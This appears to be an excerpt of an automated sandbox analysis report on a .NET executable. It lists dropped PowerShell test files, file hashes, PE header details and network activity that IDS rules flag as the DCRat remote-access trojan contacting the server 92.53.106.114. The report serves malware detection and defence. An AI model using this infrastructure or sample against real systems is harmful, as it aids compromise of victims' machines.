Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fwor1wx.sqb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0s1pqnbe.dro.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zfw33pi.hzt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jzb5ry3.l4o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tgbpsph.yho.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eb5jkhpc.cst.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebn3tgjf.xpx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hytc305s.t01.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixmyw4u4.hbg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l40pauoc.v4p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_luv5tkbn.ewm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lv0vjlew.ztr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohpy4g53.bcq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qveabrb0.4l4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzbxldse.urg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2qthjvs.xei.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2fesw54.zhj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuvthf2h.bfo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3daqyfy.rfn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoixnhwg.ctr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrmagh1x.23p.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykzlaqfc.url.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbjifgl4.kjf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuijph1w.1xc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.389951309114567
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	kQyd2z80gD.exe
File size:	530'432 bytes
MD5:	4a3bf58e23a86ea73d2f1d8ba04e7467
SHA1:	88099e13c38f4adfef4a64ca91b681c8cfa85834
SHA256:	ba30eaf70b11268accb528ce65cea53a3ec811d2e368e4a3d19ebdfaf02cc233
SHA512:	dd2ffed4fa44c5a81db9898b57488996165b9b58a0c30176b335cbc81d74fb86541645e0167ac58f73de547dedf4ba9ed419477e17f170f10a8472f106a2d9c5
SSDEEP:	12288:tZ2N7BcysKLDraDdvdx5gqJSpxw3+i4rF/Fx:tZ2cvYaLxuqSN
TLSH:	71B4D6342EEE0129F17BAF7985E17596DA7EB6B377179A0D04A102CA0723B41DDC063B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb..........".................N/... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x482f4e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x82ef8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x218	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x80f54	0x81000	8c975035d04e678d05cd824c7a70907f	False	0.45134409823158916	data	5.400649520299285	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x218	0x400	043c2473bd0cfdeb01c230375b578f2e	False	0.2626953125	data	1.8390800949553323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x86000	0xc	0x200	50894a75f557f102b4e283636de4eafd	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x84058	0x1c0	ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970	English	United States	0.5223214285714286

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T13:57:09.154952+0200	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49704	92.53.106.114	80	TCP
2024-10-24T13:57:27.029642+0200	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	92.53.106.114	80	192.168.2.5	49743	TCP
2024-10-24T13:59:06.623415+0200	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	92.53.106.114	80	192.168.2.5	49997	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 13:57:08.153727055 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:08.159282923 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:08.159662008 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:08.159954071 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:08.165493011 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:09.154788017 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:09.154881001 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:09.154892921 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:09.154952049 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:09.850696087 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:09.855211973 CEST	49705	80	192.168.2.5	92.53.106.114
